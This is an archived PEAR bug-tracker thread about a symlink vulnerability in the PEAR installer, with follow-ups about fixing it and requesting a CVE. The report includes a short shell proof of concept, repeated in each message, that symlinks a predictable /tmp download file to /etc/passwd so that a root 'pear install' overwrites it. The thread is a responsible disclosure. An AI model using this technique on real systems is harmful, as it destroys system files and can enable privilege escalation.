FAQ
Edit report at http://pear.php.net/bugs/bug.php?id=18056&edit=1

ID: 18056
Updated by: helgith@gmail.com
Reported By: ondrej at sury dot org
Summary: [SECURITY]: Symlink attack in PEAR install
Status: Open
Type: Bug
Package: PEAR
Operating System: Linux
Package Version: 1.9.1
PHP Version: 5.3.3
-Assigned To:
+Assigned To: dufuz
Roadmap Versions:
New Comment:

-Assigned To:
+Assigned To: dufuz



Previous Comments:
------------------------------------------------------------------------

[2010-11-14 15:29:11] ondrej

This should probably get a CVE.

It's already tracked under:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546164
http://security-tracker.debian.org/tracker/TEMP-0546164-014755

Bug first reported by Raphael Geisert (one of Debian php5 maintainers).

Ondrej, on behalf of Debian PHP5 maintainers

------------------------------------------------------------------------

[2010-11-14 15:26:39] ondrej

Description:
------------
There's symlink vulnerability when doing PEAR install. PEAR
should really be using $(mktemp) for it's directories like
download_dir, cache_dir and tmp_dir, and check whether the
directory doesn't exists.

Test script:
---------------
# pear config-show | grep /tmp
PEAR Installer cache directory cache_dir /tmp/pear/cache
PEAR Installer download download_dir
/tmp/buildd/php5-5.3.3/pear-build-download
PEAR Installer temp directory temp_dir /tmp/pear/temp

# ls -ld /tmp/buildd/php5-5.3.3/pear-build-download
drwxr-xr-x 2 ondrej ondrej 4096 Nov 14 14:17
/tmp/buildd/php5-5.3.3/pear-build-download

# su - ondrej
$ cd /tmp/buildd/php5-5.3.3/pear-build-download
$ ln -s /etc/passwd package.xml
$ cat package.xml
root:x:0:0:root:/root:/bin/bash
[...]
$ logout

# pear install Net_Socket
downloading Net_Socket-1.0.10.tgz ...
Starting to download Net_Socket-1.0.10.tgz (5,429 bytes)
.....done: 5,429 bytes
install ok: channel://pear.php.net/Net_Socket-1.0.10


# head /etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<package packagerversion="1.9.1" version="2.0"
xmlns="http://pear.php.net/dtd/package-2.0"
xmlns:tasks="http://pear.php.net/dtd/tasks-1.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
http://pear.php.net/dtd/tasks-1.0.xsd
http://pear.php.net/dtd/package-2.0
" rel="nofollow">http://pear.php.net/dtd/package-2.0.xsd">
<name>Net_Socket</name>
<channel>pear.php.net</channel>
<summary>Network Socket Interface</summary>
<description>Net_Socket is a class interface to TCP sockets. It
provides blocking
and non-blocking operation, with different reading and writing modes
(byte-wise, block-wise, line-wise and special formats like network
byte-order ip addresses).</description>
<lead>


Expected result:
----------------
Not overwriting system files. Not vulnerable to symlink attack.

Actual result:
--------------
Overwritten /etc/passwd just by creating right directories and
symlinks.

------------------------------------------------------------------------

Search Discussions

  • Helgith at Dec 29, 2010 at 4:05 am
    Edit report at http://pear.php.net/bugs/bug.php?id=18056&edit=1

    ID: 18056
    Updated by: helgith@gmail.com
    Reported By: ondrej at sury dot org
    Summary: [SECURITY]: Symlink attack in PEAR install
    Status: Assigned
    Type: Bug
    Package: PEAR
    Operating System: Linux
    Package Version: 1.9.1
    PHP Version: 5.3.3
    Assigned To: dufuz
    Roadmap Versions:
    New Comment:

    A fix is coming soon, sorry for the delays. As for the CVE, is that
    something you (or
    any of the Debian people) want to take care of?


    Previous Comments:
    ------------------------------------------------------------------------

    [2010-12-08 01:35:29] dufuz

    -Assigned To:
    +Assigned To: dufuz


    ------------------------------------------------------------------------

    [2010-11-14 15:29:11] ondrej

    This should probably get a CVE.

    It's already tracked under:
    http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546164
    http://security-tracker.debian.org/tracker/TEMP-0546164-014755

    Bug first reported by Raphael Geisert (one of Debian php5 maintainers).

    Ondrej, on behalf of Debian PHP5 maintainers

    ------------------------------------------------------------------------

    [2010-11-14 15:26:39] ondrej

    Description:
    ------------
    There's symlink vulnerability when doing PEAR install. PEAR
    should really be using $(mktemp) for it's directories like
    download_dir, cache_dir and tmp_dir, and check whether the
    directory doesn't exists.

    Test script:
    ---------------
    # pear config-show | grep /tmp
    PEAR Installer cache directory cache_dir /tmp/pear/cache
    PEAR Installer download download_dir
    /tmp/buildd/php5-5.3.3/pear-build-download
    PEAR Installer temp directory temp_dir /tmp/pear/temp

    # ls -ld /tmp/buildd/php5-5.3.3/pear-build-download
    drwxr-xr-x 2 ondrej ondrej 4096 Nov 14 14:17
    /tmp/buildd/php5-5.3.3/pear-build-download

    # su - ondrej
    $ cd /tmp/buildd/php5-5.3.3/pear-build-download
    $ ln -s /etc/passwd package.xml
    $ cat package.xml
    root:x:0:0:root:/root:/bin/bash
    [...]
    $ logout

    # pear install Net_Socket
    downloading Net_Socket-1.0.10.tgz ...
    Starting to download Net_Socket-1.0.10.tgz (5,429 bytes)
    .....done: 5,429 bytes
    install ok: channel://pear.php.net/Net_Socket-1.0.10


    # head /etc/passwd
    <?xml version="1.0" encoding="UTF-8"?>
    <package packagerversion="1.9.1" version="2.0"
    xmlns="http://pear.php.net/dtd/package-2.0"
    xmlns:tasks="http://pear.php.net/dtd/tasks-1.0"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
    http://pear.php.net/dtd/tasks-1.0.xsd
    http://pear.php.net/dtd/package-2.0
    " rel="nofollow">http://pear.php.net/dtd/package-2.0.xsd">
    <name>Net_Socket</name>
    <channel>pear.php.net</channel>
    <summary>Network Socket Interface</summary>
    <description>Net_Socket is a class interface to TCP sockets. It
    provides blocking
    and non-blocking operation, with different reading and writing modes
    (byte-wise, block-wise, line-wise and special formats like network
    byte-order ip addresses).</description>
    <lead>


    Expected result:
    ----------------
    Not overwriting system files. Not vulnerable to symlink attack.

    Actual result:
    --------------
    Overwritten /etc/passwd just by creating right directories and
    symlinks.

    ------------------------------------------------------------------------
  • Ondrej at Dec 29, 2010 at 12:20 pm
    Edit report at http://pear.php.net/bugs/bug.php?id=18056&edit=1

    ID: 18056
    Updated by: ondrej@sury.org
    Reported By: ondrej at sury dot org
    Summary: [SECURITY]: Symlink attack in PEAR install
    Status: Assigned
    Type: Bug
    Package: PEAR
    Operating System: Linux
    Package Version: 1.9.1
    PHP Version: 5.3.3
    Assigned To: dufuz
    Roadmap Versions:
    New Comment:

    Hi, thanks for working on the fix.

    You should probably request a CVE, since you are the owner of the
    project. I guess
    you can ask on internals how to do that.

    Ondrej


    Previous Comments:
    ------------------------------------------------------------------------

    [2010-12-29 05:06:55] dufuz

    A fix is coming soon, sorry for the delays. As for the CVE, is that
    something you (or
    any of the Debian people) want to take care of?

    ------------------------------------------------------------------------

    [2010-12-08 01:35:29] dufuz

    -Assigned To:
    +Assigned To: dufuz


    ------------------------------------------------------------------------

    [2010-11-14 15:29:11] ondrej

    This should probably get a CVE.

    It's already tracked under:
    http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546164
    http://security-tracker.debian.org/tracker/TEMP-0546164-014755

    Bug first reported by Raphael Geisert (one of Debian php5 maintainers).

    Ondrej, on behalf of Debian PHP5 maintainers

    ------------------------------------------------------------------------

    [2010-11-14 15:26:39] ondrej

    Description:
    ------------
    There's symlink vulnerability when doing PEAR install. PEAR
    should really be using $(mktemp) for it's directories like
    download_dir, cache_dir and tmp_dir, and check whether the
    directory doesn't exists.

    Test script:
    ---------------
    # pear config-show | grep /tmp
    PEAR Installer cache directory cache_dir /tmp/pear/cache
    PEAR Installer download download_dir
    /tmp/buildd/php5-5.3.3/pear-build-download
    PEAR Installer temp directory temp_dir /tmp/pear/temp

    # ls -ld /tmp/buildd/php5-5.3.3/pear-build-download
    drwxr-xr-x 2 ondrej ondrej 4096 Nov 14 14:17
    /tmp/buildd/php5-5.3.3/pear-build-download

    # su - ondrej
    $ cd /tmp/buildd/php5-5.3.3/pear-build-download
    $ ln -s /etc/passwd package.xml
    $ cat package.xml
    root:x:0:0:root:/root:/bin/bash
    [...]
    $ logout

    # pear install Net_Socket
    downloading Net_Socket-1.0.10.tgz ...
    Starting to download Net_Socket-1.0.10.tgz (5,429 bytes)
    .....done: 5,429 bytes
    install ok: channel://pear.php.net/Net_Socket-1.0.10


    # head /etc/passwd
    <?xml version="1.0" encoding="UTF-8"?>
    <package packagerversion="1.9.1" version="2.0"
    xmlns="http://pear.php.net/dtd/package-2.0"
    xmlns:tasks="http://pear.php.net/dtd/tasks-1.0"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
    http://pear.php.net/dtd/tasks-1.0.xsd
    http://pear.php.net/dtd/package-2.0
    " rel="nofollow">http://pear.php.net/dtd/package-2.0.xsd">
    <name>Net_Socket</name>
    <channel>pear.php.net</channel>
    <summary>Network Socket Interface</summary>
    <description>Net_Socket is a class interface to TCP sockets. It
    provides blocking
    and non-blocking operation, with different reading and writing modes
    (byte-wise, block-wise, line-wise and special formats like network
    byte-order ip addresses).</description>
    <lead>


    Expected result:
    ----------------
    Not overwriting system files. Not vulnerable to symlink attack.

    Actual result:
    --------------
    Overwritten /etc/passwd just by creating right directories and
    symlinks.

    ------------------------------------------------------------------------

Related Discussions

Discussion Navigation
viewthread | post
Discussion Overview
grouppear-bugs @
categoriesphp
postedDec 8, '10 at 12:34a
activeDec 29, '10 at 12:20p
posts3
users2
websitepear.php.net

2 users in discussion

Helgith: 2 posts Ondrej: 1 post

People

Translate

site design / logo © 2022 Grokbase